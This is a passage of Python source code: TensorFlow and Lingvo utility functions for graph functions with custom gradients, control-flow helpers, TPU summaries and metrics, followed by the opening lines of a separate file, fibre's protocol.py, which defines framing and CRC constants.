    # context. This is necessary if the function body captures any non-tensor
    # values from the environment, like symbolic maps.
    cf = Fn.get_concrete_function()
    cf.add_to_graph()
    return cf

  # For the `foo = _WrapFunction(foo, ...)` use case.
  if func is not None:
    return Decorated(func)
  # For the `@_WrapFunction(...)` use case.
  return Decorated
def _DefineFunction(fwd, fwd_sig, bak=None, bak_as_function=False, device=None):
  """Wraps fwd in a tf.function with custom gradient bak.

  Args:
    fwd: A callable xs: Nested Structure -> ys: Nested Structure.
    fwd_sig: A Nested Structure of tf.TensorSpec representing the input
      signature of `fwd`, or None (meaning that fwd takes no inputs).
    bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
      Structure. The custom backprop function for `fwd`. bak needs to return
      dcapture if fwd uses any implicitly captured tensors, whose gradients are
      dcapture.
    bak_as_function: Whether to create a TF graph function for `bak`.
    device: the device on which to run `fwd` and `bak`.

  Returns:
    A NestedMap containing:

    - call: A callable that will execute `fwd`. It has the same input and
      output signatures as `fwd`.
    - func: The underlying TF function that `call` calls. If not None, it will
      be a _DefinedFunction or ConcreteFunction that takes flat inputs and
      returns flat outputs, and can be used by routines that require a TF
      function object (e.g. tf.If, tf.While, etc).
      Always not None when `bak` is None.
    - outputs: The outputs of `fwd`. Used for reflection only (e.g. to get the
      output dtypes, shapes, etc).
    - stateful_ops: A list of (op_name, op_type) tuples representing the
      stateful ops used by `fwd`.
    - captured_inputs: Implicit inputs captured by `fwd`.
  """
  assert fwd is not None
  # Outside XLA, keep the function non-inlined so RemoveAssertContext (used
  # below) applies to its body.
  noinline = not use_xla()
  if fwd_sig is None:
    fwd_sig = []
  if device is None:
    # Get the current device to mimic Defun's behavior.
    # pylint: disable=protected-access
    device_funcs = tf.get_default_graph()._device_functions_outer_to_inner
    device = device_funcs[-1] if device_funcs else None
    # pylint: enable=protected-access
  # Output of this method.
  res = NestedMap()

  @_WrapFunction(input_signature=Flatten(fwd_sig))
  def Forward(*args):
    """The forward function."""
    with RemoveAssertContext(remove=noinline), tf.device(device):
      if args:
        xs = Pack(fwd_sig, args)
        rets = fwd(xs)
      else:
        rets = fwd()
    # Stash the structured outputs so Call below can re-pack flat results.
    res.outputs = rets
    return Flatten(rets)

  res.captured_inputs = Forward.captured_inputs
  # Get the stateful ops used in cell_fn. Logic borrowed from
  # _EagerDefinedFunction.__init__().
  graph = Forward.graph
  input_ops = set(arg.op for arg in graph.inputs)
  operations = [op for op in graph.get_operations() if op not in input_ops]
  res.stateful_ops = [(o.name, o.type) for o in operations if o._is_stateful]  # pylint: disable=protected-access

  def Call(func, args=None):
    """Wrapper of fwd."""
    if args is None:
      flat_rets = func()
    else:
      flat_rets = func(*Flatten(args))
    if not isinstance(flat_rets, (tuple, list)):
      flat_rets = [flat_rets]
    return Pack(res.outputs, flat_rets)

  if not bak:
    # No custom gradient: expose the traced function directly.
    res.func = Forward
    res.call = lambda args=None: Call(Forward, args)
    return res

  # Capture the sharing setting now so the (possibly deferred) backward call
  # runs under the same setting.
  shared_rendezvous = _GetSharedRendezvous()
  ret_specs = TensorSpecs(res.outputs)

  def Backward(*args):
    # args is the flat concatenation of [xs, ys, dys].
    xs, ys, dys = Pack([fwd_sig, ret_specs, ret_specs], args)
    with RemoveAssertContext(remove=noinline), tf.device(device):
      dxs = bak(xs, ys, dys)
    return Flatten(dxs)

  if bak_as_function:
    backward_cf = _WrapFunction(
        Backward, input_signature=Flatten([fwd_sig, ret_specs, ret_specs]))
  else:

    def BackwardWithSharedRendezvous(*args):
      with _SharedRendezvousScope(shared_rendezvous):
        return Backward(*args)

    backward_cf = BackwardWithSharedRendezvous

  @tf.custom_gradient
  def ForwardWithGrad(*args):
    """Forward function and its custom gradient."""
    # Note that `args` includes implicit captures. This is required by
    # tf.custom_gradient so that when the Grad() outputs include gradients to
    # implicit captures, they match the inputs to ForwardWithGrad().
    #
    # However, Forward doesn't take implicit captures as input, so we exclude
    # them here.
    fwd_args = args[:(len(args) - len(Flatten(res.captured_inputs)))]
    op = NestedMap(inputs=args, outputs=Forward(*fwd_args))

    def Grad(*args, **kwargs):
      """Gradient function for the forward function.

      Args:
        *args: Gradients wrt op.outputs.
        **kwargs: Additional arguments from tf.custom_gradient.

      Returns:
        Tuple of derivatives.
      """
      if kwargs:
        tf.logging.warning(
            'Ignoring additional arguments used by tf.custom_gradient: %s',
            str(kwargs))
      _AssertInputsMatch(op, fwd_sig, res.captured_inputs)
      # Ensure dys contains no None.
      args = ConvertNoneGradientToZeros(list(op.outputs), list(args))
      xs, _ = Pack([fwd_sig, res.captured_inputs], op.inputs)
      return backward_cf(*Flatten([xs, op.outputs, args]))

    return op.outputs, Grad

  res.func = None
  # `forward` re-appends the implicit captures so ForwardWithGrad sees them.
  forward = lambda *xs: ForwardWithGrad(*Flatten([xs, res.captured_inputs]))
  res.call = lambda args=None: Call(forward, args)
  return res
# Global variable to control whether to use tf.function.
# If not set, the result is determined by tf2 status. See _UseTfFunction for
# details.
# TODO(laigd): remove after b/169869929 is fixed.
_USE_TF_FUNCTION = ThreadLocalStack()

# Constants for propagating framework tensors through Function.
# Key under which the global step tensor is threaded through Function calls.
_FRAMEWORK_TENSOR_GLOBAL_STEP = '_global_step'
@contextlib.contextmanager
def TfFunctionScope(use_tf_function=True):
  """Scopes the thread-local preference for tf.function over tf.Defun."""
  stack = _USE_TF_FUNCTION.stack
  stack.append(use_tf_function)
  try:
    yield
  finally:
    stack.pop()
def _UseTfFunction():
  """Whether to use tf.function instead of tf.Defun."""
  stack = _USE_TF_FUNCTION.stack
  if stack:
    # An explicit TfFunctionScope setting takes precedence.
    return stack[-1]
  # Otherwise follow the ambient TF2 status.
  return tf2_enabled()
class Function(object):
  """Function builds a TensorFlow graph function from a callable.

  In the high level this is similar to tf.Defun and tf.function. In fact this
  relies on those as underlying implementations, but with specific configuration
  so it's easier to use and can work well in some extreme cases in Lingvo.

  Example usage:

  - No inputs:

    >>> @Function()
    ... def foo():
    ...   return tf.constant(1.0)
    >>> y = foo()

  - Scalar input:

    >>> @Function(fwd_sig=tf.TensorSpec(None, tf.float32))
    ... def foo(x):
    ...   return x * 2
    >>> y = foo(1.0)

  - List input:

    >>> @Function(fwd_sig=[tf.TensorSpec(None, tf.float32) for _ in range(2)])
    ... def foo(xs):
    ...   return xs[0] + xs[1]
    >>> y = foo([1.0, 2.0])

  - Nested input:

    >>> @Function(fwd_sig=NestedMap(x=tf.TensorSpec(None, tf.float32)))
    ... def foo(nmap):
    ...   return nmap.x * 2
    >>> y = foo(NestedMap(x=1.0))

  - With custom gradient function (other input types mentioned above are also
    supported):

    >>> def bar(x, y, dy):
    ...   del y  # only x and dy are needed to compute the gradient
    ...   return 4.0 * x * dy
    >>>
    >>> @Function(fwd_sig=tf.TensorSpec(None, tf.float32), bak=bar)
    ... def foo(x):
    ...   return 2.0 * x * x

  - Used in control flow ops:

    >>> then_branch = Function(tf.TensorSpec([], tf.int32))(lambda x: x / 2)
    >>> else_branch = Function(tf.TensorSpec([], tf.int32))(lambda x: 3 * x + 1)
    >>> y = tf.If(cond, inputs, then_branch.func, else_branch.func)
  """

  # TODO(laigd): the use_tf_function option is added for backward compatibility
  # reasons. Remove it after the migration.
  def __init__(self,
               fwd_sig=None,
               bak=None,
               bak_as_function=False,
               device=None,
               use_tf_function=None):
    """Constructor.

    Below we assume `fwd` is the input to `__call__` that is used to build the
    TensorFlow graph function encapsulated by this object.

    Args:
      fwd_sig: A Nested Structure of tf.TensorSpec representing the input
        signature of `fwd`, or None (meaning that `fwd` takes no inputs). The
        actual inputs should be compatible with this (have same shapes and
        dtypes).
      bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
        Structure. The custom backprop function for `fwd`. bak needs to return
        dcapture if `fwd` uses any implicitly captured tensors, whose gradients
        are dcapture.
      bak_as_function: Whether to create a TF graph function for `bak`.
      device: The device on which to run `fwd` and `bak`. Defaults to the
        current device.
      use_tf_function: Whether use tf.function. Defaults to _UseTfFunction().
    """
    # Only configuration is stored here; the graph function itself is built
    # lazily by __call__ via DefinedFunction.
    self._fwd_sig = fwd_sig
    self._bak = bak
    self._bak_as_function = bak_as_function
    self._device = device
    self._use_tf_function = use_tf_function

  def __call__(self, fwd):
    """Creates a graph function.

    Args:
      fwd: a callable xs: Nested Structure -> ys: Nested Structure.

    Returns:
      A DefinedFunction object encapsulating `fwd` as a graph function.
    """
    assert callable(fwd)
    return DefinedFunction(fwd, self._fwd_sig, self._bak, self._bak_as_function,
                           self._device, self._use_tf_function)
class DefinedFunction(object):
  """Encapsulates a TensorFlow graph function and its properties."""

  def __init__(self,
               fwd,
               fwd_sig=None,
               bak=None,
               bak_as_function=False,
               device=None,
               use_tf_function=None):
    """Constructor.

    Args:
      fwd: A callable xs: Nested Structure -> ys: Nested Structure. Used to
        build the TensorFlow graph function that this object encapsulates.
      fwd_sig: A Nested Structure of tf.TensorSpec representing the input
        signature of `fwd`, or None (meaning that `fwd` takes no inputs). The
        actual inputs should be compatible with this (have same shapes and
        dtypes).
      bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
        Structure. The custom backprop function for `fwd`. bak needs to return
        dcapture if `fwd` uses any implicitly captured tensors, whose gradients
        are dcapture.
      bak_as_function: Whether to create a TF graph function for `bak`.
      device: The device on which to run `fwd` and `bak`. Defaults to the
        current device.
      use_tf_function: Whether use tf.function. Defaults to _UseTfFunction().
    """
    self._fwd_sig = fwd_sig

    # NOTE(review): this assignment is dead — wrapped_fwd_sig is
    # unconditionally rebuilt as a NestedMap a few lines below.
    wrapped_fwd_sig = fwd_sig
    fwd_fn = fwd
    bak_fn = bak

    # Capture the graph seed so the traced function reproduces it.
    graph_random_seed = None
    if tf.get_default_graph().seed is not None:
      graph_random_seed = tf.get_default_graph().seed

    # Wrap the forward function to propagate framework tensors like step_seed
    # and global_step.
    wrapped_fwd_sig = NestedMap()
    self._added_global_step = False
    if GetGlobalStep() is not None:
      # Thread the global step through as an explicit int64 scalar input.
      wrapped_fwd_sig[_FRAMEWORK_TENSOR_GLOBAL_STEP] = (
          tf.TensorSpec([], tf.int64))
      self._added_global_step = True
    if fwd_sig is not None:
      wrapped_fwd_sig.inputs = fwd_sig
    elif not wrapped_fwd_sig:
      # Neither user inputs nor framework tensors: no signature at all.
      wrapped_fwd_sig = None

    def ForwardWrapped(wrapped_inputs=None):
      # Restore the captured graph seed inside the traced function.
      if graph_random_seed is not None:
        tf.random.set_seed(graph_random_seed)
      global_step = None
      if wrapped_inputs:
        assert isinstance(wrapped_inputs, NestedMap)
        global_step = wrapped_inputs.get(_FRAMEWORK_TENSOR_GLOBAL_STEP, None)
      # Make the propagated global step visible to `fwd` via the context.
      with GlobalStepContext(global_step):
        if wrapped_inputs and 'inputs' in wrapped_inputs:
          result = fwd(wrapped_inputs.inputs)
        else:
          result = fwd()
      return result

    fwd_fn = ForwardWrapped

    if bak:
      # Wrap the backward function to return zero gradients for framework
      # tensors like step_seed and global_step.
      def BackwardWrapped(wrapped_xs, ys, dys):
        if graph_random_seed is not None:
          tf.random.set_seed(graph_random_seed)
        with GlobalStepContext(
            wrapped_xs.get(_FRAMEWORK_TENSOR_GLOBAL_STEP, None)):
          result = bak(wrapped_xs.inputs, ys, dys)
        # Start with zeros for every wrapped input (covers framework tensors),
        # then overwrite the user-input slots with the real gradients.
        dxs = Transform(tf.zeros_like, wrapped_xs)
        if isinstance(result, tuple) and len(result) == 2:
          # bak returned (dxs, dcapture) for implicitly captured tensors.
          dxs.inputs, dcapture = result
          return dxs, dcapture
        else:
          dxs.inputs = result
          return dxs

      bak_fn = BackwardWrapped

    if use_tf_function is None:
      use_tf_function = _UseTfFunction()
    fn = _DefineFunction if use_tf_function else _DefineDefun
    self._data = fn(
        fwd=fwd_fn,
        fwd_sig=wrapped_fwd_sig,
        bak=bak_fn,
        bak_as_function=bak_as_function,
        device=device)

  def __call__(self, args=None):
    """Invokes the graph function.

    Args:
      args: the inputs to the graph function, must be compatible with `fwd_sig`.

    Returns:
      The output tensors with the same structure as the output of `fwd`,
      returned by a call to the graph function.
    """
    assert IsCompatible(args,
                        self._fwd_sig), '{} vs {}'.format(args, self._fwd_sig)
    # Framework tensors (e.g. global step) are added transparently here.
    return self._data.call(self.AddFrameworkInputs(args))

  @property
  def func(self):
    """The underlying TensorFlow graph function that this object encapsulates.

    The returned graph function is created by tracing `fwd` during construction.
    If not None, it will be a _DefinedFunction or ConcreteFunction that takes
    flat inputs and returns flat outputs, and can be used by routines that
    require a TensorFlow function object (e.g. tf.If, tf.While, etc).

    If no backprop function is provided during construction, the result is
    always not None.
    """
    return self._data.func

  def AddFrameworkInputs(self, inputs):
    """Add framework tensors like step_seed and global_step to inputs.

    This is only necessary when using `func`, as wrapping is handled
    automatically in __call__.

    Args:
      inputs: inputs to the function.

    Returns:
      Inputs wrapped with framework tensors suitable for use with `func`.
    """
    result = NestedMap()
    if self._added_global_step:
      # The signature included a global step at trace time, so the current
      # global step must exist now as well.
      global_step = GetGlobalStep()
      assert global_step is not None
      result[_FRAMEWORK_TENSOR_GLOBAL_STEP] = tf.cast(global_step, tf.int64)
    if inputs is not None:
      result.inputs = inputs
    return result if result else None

  @property
  def output_dtypes(self):
    """Output dtypes of the graph function.

    The result will have the same structure as the outputs of `fwd` but contain
    the corresponding output dtypes.
    """
    return Transform(lambda x: x.dtype, self._data.outputs)

  @property
  def stateful_ops(self):
    """Stateful ops used by `fwd`, as a list of (op_name, op_type) tuples."""
    return self._data.stateful_ops

  @property
  def captured_inputs(self):
    """Implicit input tensors captured by `fwd`."""
    return self._data.captured_inputs
def CallDefun(fwd, args=None, bak=None, bak_as_function=False, device=None):
  """Wraps fwd in a defun with custom gradient bak and calls it with args.

  Args:
    fwd: A callable xs: Nested Structure -> ys: Nested Structure.
    args: A Nested Structure of tf.Tensor or None.
    bak: A callable xs, ys, dys: Nested Structure -> dxs[, dcapture]: Nested
      Structure. The custom backprop function for fwd. bak needs to return
      dcapture if fwd uses any implicitly captured tensors, whose gradients are
      dcapture.
    bak_as_function: Whether to create a TF graph function for bak.
    device: the device on which to run fwd and bak.

  Returns:
    A Nested Structure equivalent to what fwd(args) computes.
  """
  if args is not None:
    # Normalize the inputs to tensors so TensorSpecs can be derived.
    args = Transform(tf.convert_to_tensor, args)
  defined = Function(
      fwd_sig=TensorSpecs(args),
      bak=bak,
      bak_as_function=bak_as_function,
      device=device)(
          fwd=fwd)
  return defined() if args is None else defined(args)
def If(cond, inputs, then_branch, else_branch):
  """Helper to construct an if/else statement.

  Args:
    cond: A scalar `Tensor` that can be converted to boolean.
    inputs: A flattenable representing the input tensors of the if/else
      statement. Can be None to represent no inputs.
    then_branch: A callable 'inputs' -> flattenable. The returned value should
      be compatible with what 'else_branch' returns.
    else_branch: A callable 'inputs' -> flattenable. The returned value should
      be compatible with what 'then_branch' returns.

  Returns:
    Output returned by the call to either 'then_branch' or 'else_branch'.
  """
  fwd_sig = TensorSpecs(inputs)
  # Trace both branches with the same input signature.
  then_fn = Function(fwd_sig=fwd_sig)(fwd=then_branch)
  else_fn = Function(fwd_sig=fwd_sig)(fwd=else_branch)
  assert IsCompatible(then_fn.output_dtypes, else_fn.output_dtypes), (
      'Outputs of then_branch and else_branch are not compatible: {} vs {}'
      .format(then_fn.output_dtypes, else_fn.output_dtypes))
  # tf.If passes one flat input list to both branches, so the branches must
  # have captured exactly the same tensors in the same order.
  if then_fn.captured_inputs != else_fn.captured_inputs:
    raise ValueError('Differing captured inputs in then and else. '
                     'Ensure the same tensors are captured in the same order.')
  flat_inputs = Flatten(then_fn.AddFrameworkInputs(inputs))
  ret = tf.If(
      cond=cond,
      inputs=flat_inputs + then_fn.captured_inputs,
      then_branch=then_fn.func,
      else_branch=else_fn.func)
  return Pack(then_fn.output_dtypes, ret)
def _Itype():
  """Loop iterator data type."""
  # XLA prefers 32-bit loop counters; use int64 elsewhere.
  if use_xla():
    return tf.int32
  return tf.int64
def WhileLoop(cond, body, loop_state):
  """Helper to construct a while loop.

  Args:
    cond: A callable NestedMap -> tf.bool.
    body: A callable NestedMap -> NestedMap.
    loop_state: A flattenable (NestedMap, list, tuple, etc.) representing the
      loop state.

  Returns:
    The final loop state in the same structure as loop_state.
  """
  fwd_sig = TensorSpecs(loop_state)
  cond_fn = Function(fwd_sig=fwd_sig)(fwd=cond)

  def BodyWrapped(state):
    # loop_state is augmented with framework tensors inside DefinedFunction.
    # tf.While must return the same structure it receives, so the body's
    # result is re-augmented here to match.
    return cond_fn.AddFrameworkInputs(body(state))

  body_fn = Function(fwd_sig=fwd_sig)(fwd=BodyWrapped)
  wrapped_state = body_fn.AddFrameworkInputs(loop_state)
  final_state = tf.While(
      Flatten(wrapped_state), cond=cond_fn.func, body=body_fn.func)
  return Pack(wrapped_state, final_state).inputs
def ForLoop(body, start, limit, delta, loop_state):
  """Helper to construct a for loop.

  Args:
    body: A callable (tf.int, NestedMap) -> NestedMap.
    start: Loop variable's initial value.
    limit: Loop variable's limit value.
    delta: Loop variable's change per iteration.
    loop_state: A flattenable (NestedMap, list, tuple, etc.) representing the
      loop state.

  Returns:
    The final loop state in the same structure as loop_state.
  """
  itype = _Itype()
  # Bundle the counter bounds together with the user state.
  state = NestedMap(
      iter=tf.cast(start, itype),
      limit=tf.cast(limit, itype),
      delta=tf.cast(delta, itype),
      loop_state=loop_state)

  def _Cond(s):
    return tf.less(s.iter, s.limit)

  def _Body(s):
    s.loop_state = body(s.iter, s.loop_state)
    s.iter = tf.add(s.iter, s.delta)
    return s

  return WhileLoop(_Cond, _Body, state).loop_state
def TopK(x_in, k):
  """Equivalent to tf.math.top_k(x_in, k) but more efficient on tpu."""
  assert k <= 2, 'This implementation is only efficient for small k.'
  # TODO(yonghui): Try out an alternative idea where we first reshape x_in as a
  # 2d tensor, then call tf.math.top_k, and then reshape back.
  x_in_shape = x_in.shape
  x_rank = x_in_shape.rank
  assert x_rank and x_in_shape.as_list()[x_rank - 1] > 0
  last_dim_size = x_in_shape.as_list()[x_rank - 1]
  # Anything masked out below will be strictly smaller than every real value.
  min_value = tf.math.reduce_min(x_in) - 1.0
  out_indices, out_values = [], []
  for _ in range(k):
    argmax = tf.math.argmax(x_in, axis=-1, output_type=tf.int32)
    onehot = tf.one_hot(argmax, last_dim_size)
    # TODO(yonghui): Would tf.gather be more efficient and numerically stable
    # here?
    out_values.append(tf.reduce_sum(onehot * x_in, -1, keepdims=True))
    out_indices.append(tf.expand_dims(argmax, -1))
    # Mask out the selected entry so the next argmax finds the runner-up.
    x_in = (1.0 - onehot) * x_in + onehot * min_value
  if k == 1:
    return out_values[0], out_indices[0]
  return tf.concat(out_values, x_rank - 1), tf.concat(out_indices, x_rank - 1)
def ReadVariable(var_op):
  """Returns the value of the given variable operation.

  Args:
    var_op: the `Operation` object for a VarHandleOp.

  Raises:
    TypeError: if var_op is not a VarHandleOp.

  Returns:
    A `Tensor` containing the value of the variable.
  """
  if var_op.type != 'VarHandleOp':
    raise TypeError('var_op should be a VarHandleOp, got %s' % str(var_op.type))
  # Filter out the ReadVariableOps that have control dependencies to avoid
  # side-effects when the user runs it.
  readers = [
      op for op in var_op.outputs[0].consumers()
      if op.type == 'ReadVariableOp' and not op.control_inputs
  ]
  assert readers
  return readers[0].outputs[0]
# Graph-collection key under which TPU summary tensors are accumulated.
_TPU_SUMMARY_TENSORS_KEY = ('__lingvo_tpu_summary_tensors')

# Getter returning the (mutable) list stored under the key above.
_get_tpu_summary_tensors = _CollectionGetter(_TPU_SUMMARY_TENSORS_KEY,
                                             lambda: [])
def AddTpuSummaryTensor(name, value, weight=1.0):
  """Adds tensor to global collection of summaries.

  This needs to be used in situations where tf.summary() could be used but
  currently tf.summary is not supported. Use py_utils.AddTpuSummaryTensor() in
  low level code to add summary tensors to global collection of summaries.
  Then recover all summary tensors from global collection by calling
  py_utils.GetTpuSummaryTensors() from top level code (for example from
  ComputeLoss method of BaseTask).

  In addition to 'name' argument, current tensorflow name scope is also
  captured and added to the metric name. This way for example summaries from
  a repeated layer will appear as separate graphs in the tensorboard.

  Weight argument is optional and defaults to 1.0. See BaseTask.ComputeLoss for
  the exact definition of weight for eval metrics.

  Args:
    name: metric name
    value: metric value tensor
    weight: weight tensor for weighted metrics
  """
  entry = NestedMap()
  entry.name = name
  entry.value = value, tf.convert_to_tensor(weight)
  # Record the current name scope so repeated layers produce distinct metrics.
  entry.name_scope = tf.get_default_graph().get_name_scope()
  _get_tpu_summary_tensors().append(entry)
def GetTpuSummaryTensors():
  """Returns summary tensors from global collection.

  Returns:
    A dict containing str keys and (metric, weight) pairs as values
  """
  summaries = {}
  for entry in _get_tpu_summary_tensors():
    # Combine the metric name with its sanitized name scope for uniqueness.
    key = '%s/%s' % (entry.name, SanitizeScopeKey(entry.name_scope))
    summaries[key] = entry.value
  return summaries
def ClearTpuSummaryTensors():
  """Removes all recorded TPU summary tensors from the global collection."""
  # Clear in place: the collection list object itself is shared.
  _get_tpu_summary_tensors()[:] = []
def ComputationShape(split_size, topology=None):
  """Decides the computation shape based on the split_size.

  Args:
    split_size: number of accelerators to use per split.
    topology: a serialized string of `tensorflow.tpu.TopologyProto`, or a
      `tf.tpu.experimental.Topology` object, that describes the TPU cluster
      topology. If not set, it'll use a default setting based on split_size.

  Returns:
    A 4-element list that describes the computation shape.
  """
  topology_info = None
  if topology:
    if isinstance(topology, tf.tpu.experimental.Topology):
      topology_info = topology
    else:
      topology_info = tf_topology.Topology(serialized=topology)

  # Case 1: the split covers the entire topology.
  if topology and functools.reduce(lambda a, b: a * b,
                                   topology_info.mesh_shape) == split_size:
    return topology_info.mesh_shape
  # Case 2: a single accelerator.
  if split_size == 1:
    return [1, 1, 1, 1]
  # Case 3 (Megacore): exact match of split_size on one mesh dimension.
  if topology and topology_info.mesh_shape[
      -1] == 1 and split_size in topology_info.mesh_shape:
    shape = [1, 1, 1, 1]
    shape[topology_info.mesh_shape.tolist().index(split_size)] = split_size
    return shape

  # Case 4: pick a default chip grid for the number of chips in the split.
  cores_per_chip = topology_info.mesh_shape[-1] if topology else 2
  assert split_size % cores_per_chip == 0
  split_chips = split_size // cores_per_chip
  if split_chips == 32:
    if topology and topology_info.mesh_shape[1] == 32:
      # Fwd within-replica all-reduces is performed along column;
      # Bwd gradient cross-replica all-reduces is performed along row.
      # This currently has better performance than the strided patten.
      return [1, 32, 1, cores_per_chip]
    return [4, 8, 1, cores_per_chip]
  chip_grid = {
      1: [1, 1],
      2: [1, 2],
      4: [2, 2],
      8: [4, 2],
      16: [4, 4],
      64: [8, 8],
      128: [8, 16],
      256: [16, 16],
      512: [16, 32],
      1024: [32, 32],
      2048: [64, 32],
      4096: [128, 32],
  }.get(split_chips)
  assert chip_grid is not None, (
      'Model parallelism with %d devices is currently not'
      ' supported.' % split_size)
  return chip_grid + [1, cores_per_chip]
def GetExtraVars():
  """Returns the captured variables by the function."""
  graph = tf.get_default_graph()
  # FuncGraph (TF2-style) tracks captures itself; fall back to tf.Defun's API.
  if isinstance(graph, func_graph.FuncGraph):
    return graph.variable_captures
  return function.get_extra_vars()
def GetExtraInputs():
  """Returns the captured input tensors by the function."""
  graph = tf.get_default_graph()
  # FuncGraph (TF2-style) tracks captures itself; fall back to tf.Defun's API.
  if isinstance(graph, func_graph.FuncGraph):
    return graph.external_captures
  return function.get_extra_inputs()
def GetExtraArgs():
  """Returns the corresponding function arguments for the captured inputs."""
  graph = tf.get_default_graph()
  # FuncGraph (TF2-style) tracks captures itself; fall back to tf.Defun's API.
  if isinstance(graph, func_graph.FuncGraph):
    return graph.internal_captures
  return function.get_extra_args()
def ShardedFilePatternToGlob(file_pattern):
  """Converts a file pattern path@shards to path-?????-of-shards."""
  # Comma-separated multi-patterns would need per-pattern expansion.
  if ',' in file_pattern:
    raise ValueError(
        'ShardedFilePatternToGlob does not support multiple file patterns.')
  if '@' not in file_pattern:
    return file_pattern
  prefix, shard_spec = file_pattern.split('@')
  if shard_spec == '*':
    return f'{prefix}-?????-of-*'
  # Shard counts are zero-padded to (at least) five digits.
  num_shards = int(shard_spec)
  return f'{prefix}-?????-of-{num_shards:05}'
def ComputeNceAndAuc(probs, targets, mask):
  """Compute normalized cross entropy and AUC of the PR curve for a batch.

  Args:
    probs: a tensor of shape [batch, time].
    targets: a tensor of shape [batch, time], where each element is either 0 or
      1 indicating wrong or correct.
    mask: a tensor of shape [batch, time], a mask for hyp sequence.

  Returns:
    nce: a tensor of shape [1], the normalized cross entropy value.
    auc: a tensor of shape [1], the AUC value.
  """

  def _SafeLog(tensor, clip_value_min=1e-8):
    """Clip all elements of a tensor to a minimum before taking log."""
    return tf.math.log(tf.clip_by_value(tensor, clip_value_min, 1.0))

  # Per-token binary cross entropy against the 0/1 targets.
  bce = -targets * _SafeLog(probs) - (1 - targets) * _SafeLog(1 - probs)
  # Fraction of correct tokens among unmasked positions.
  wcr = tf.reduce_sum(targets * mask) / tf.reduce_sum(mask)
  # Entropy of the marginal correct/incorrect distribution.
  entropy = -wcr * _SafeLog(wcr) - (1 - wcr) * _SafeLog(1 - wcr)
  avg_conditional_entropy = tf.reduce_mean(tf.boolean_mask(bce, mask))
  nce = (entropy - avg_conditional_entropy) / entropy
  auc = tf.metrics.auc(targets, probs, mask, curve='PR')[1]
  return nce, auc
def GatherTensorValuesBySeqIndices(tensor, class_indices, keepdims=False):
  """Gather values from a 3d tensor according to sequences of indices.

  Args:
    tensor: a 3d tensor of [dim0, dim1, num_class], e.g. output from softmax.
    class_indices: a 2d tensor of [dim0, dim1], where the second dim is a
      sequence of class indices between 0 to num_class - 1, inclusive.
    keepdims: bool, expand the last dimension of the returned tensor if True.

  Returns:
    A tensor ret of [dim0, dim1], where
    ret[b, t] = tensor[b, t, indices[b, t]].
    If keepdims is True, then ret has shape [dim0, dim1, 1].
  """
  tensor = HasRank(tensor, 3)
  class_indices = HasRank(class_indices, 2)
  tensor = HasShape(tensor, GetShape(class_indices), 2)
  dim0 = GetShape(class_indices)[0]
  dim1 = GetShape(class_indices)[1]
  # Build [b, t] coordinate grids so gather_nd can pick [b, t, class] triples.
  rows = tf.tile(tf.expand_dims(tf.range(dim0), axis=-1), [1, dim1])
  cols = tf.tile(tf.expand_dims(tf.range(dim1), axis=0), [dim0, 1])
  gather_indices = tf.stack([
      tf.cast(rows, dtype=class_indices.dtype),
      tf.cast(cols, dtype=class_indices.dtype), class_indices
  ],
                            axis=-1)
  gathered = tf.gather_nd(tensor, gather_indices)
  return tf.expand_dims(gathered, axis=-1) if keepdims else gathered
def GetSoftmaxProbsBySeqIndices(logits, indices, keepdims=False):
  """Get softmax probabilities from index sequences given logits sequences.

  Args:
    logits: a tensor of [batch, time, num_class] or [time, batch, num_class].
    indices: a tensor of [batch, time] or [time, batch].
    keepdims: bool, expand the last dimension of the returned tensor if True.

  Returns:
    a tensor of [batch, time] or [time, batch] for the corresponding softmax
    probabilities. If keepdims is True, returned tensor has a third dimension
    of size 1.
  """
  # Softmax over the class dimension, then pick each step's indexed class.
  return GatherTensorValuesBySeqIndices(
      tf.nn.softmax(logits), indices, keepdims)
def DivideNoNan(x, y):
  """Equivalent to tf.math.divide_no_nan but supports bfloat16."""
  denominator_is_zero = tf.equal(y, 0.)
  # Divide by 1 where y is zero (keeps the op finite), then zero the result.
  safe_y = tf.where(denominator_is_zero, tf.ones_like(y), y)
  return tf.where(denominator_is_zero, tf.zeros_like(x), x / safe_y)
def SequencePaddings(seqlen, maxlen=None):
  """Returns paddings (1.0 = padded position) for the given sequence lengths."""
  # Invert the 0/1 validity mask produced by tf.sequence_mask.
  return 1 - tf.sequence_mask(seqlen, maxlen, dtype=tf.float32)
def AppendDims(x, ndims):
  """Appends `ndims` trailing dimensions of size 1 to `x`."""
  expanded_shape = GetShape(x) + [1] * ndims
  return tf.reshape(x, expanded_shape)
def MaybeSoftCapLogits(x, cap=0.0):
  """Caps logits x to be within a certain range.

  Args:
    x: A float tensor, the logit values to be capped.
    cap: a float, the limit to cap x within. If cap <= 0.0, x is not capped.

  Returns:
    logits after capping.
  """
  # Non-positive cap disables capping entirely.
  if cap <= 0.0:
    return x
  # tanh smoothly saturates, keeping the output within (-cap, cap).
  return cap * tf.math.tanh(x / cap)
def GetTpuEmbeddingGraphCollection():
  """Return the graph collection that stores the TpuEmbeddingCollection."""
  collection = tf.get_collection_ref('__tpu_embedding_collection')
  # At most one TpuEmbeddingCollection may live in the graph.
  assert len(collection) <= 1
  return collection
|
protocol.py | # See protocol.hpp for an overview of the protocol
import time
import struct
import sys
import threading
import traceback
#import fibre.utils
from fibre.utils import Event, wait_any, TimeoutError
import abc
# Use abc.ABC directly on Python >= 3.4; otherwise fall back to the
# metaclass spelling that works on older interpreters.
if sys.version_info >= (3, 4):
    ABC = abc.ABC
else:
    ABC = abc.ABCMeta('ABC', (), {})

# Backport time.monotonic for Python < 3.3 via the `monotonic` package.
if sys.version_info < (3, 3):
    from monotonic import monotonic
    time.monotonic = monotonic
# Framing constants; see protocol.hpp for the wire format.
SYNC_BYTE = 0xAA         # first byte of every framed packet
CRC8_INIT = 0x42         # initial remainder for the header CRC
CRC16_INIT = 0x1337      # initial remainder for the payload CRC
PROTOCOL_VERSION = 1

CRC8_DEFAULT = 0x37 # this must match the polynomial in the C++ implementation
CRC16_DEFAULT = 0x3d65 # this must match the polynomial in the C++ implementation

MAX_PACKET_SIZE = 128    # maximum framed packet size in bytes

def calc_crc(remainder, value, polynomial, bitwidth):
    """Feeds one input byte into an MSB-first CRC.

    Args:
        remainder: the running CRC remainder.
        value: the next input byte (0..255).
        polynomial: the CRC polynomial without the implicit top bit.
        bitwidth: the CRC width in bits (e.g. 8 or 16).

    Returns:
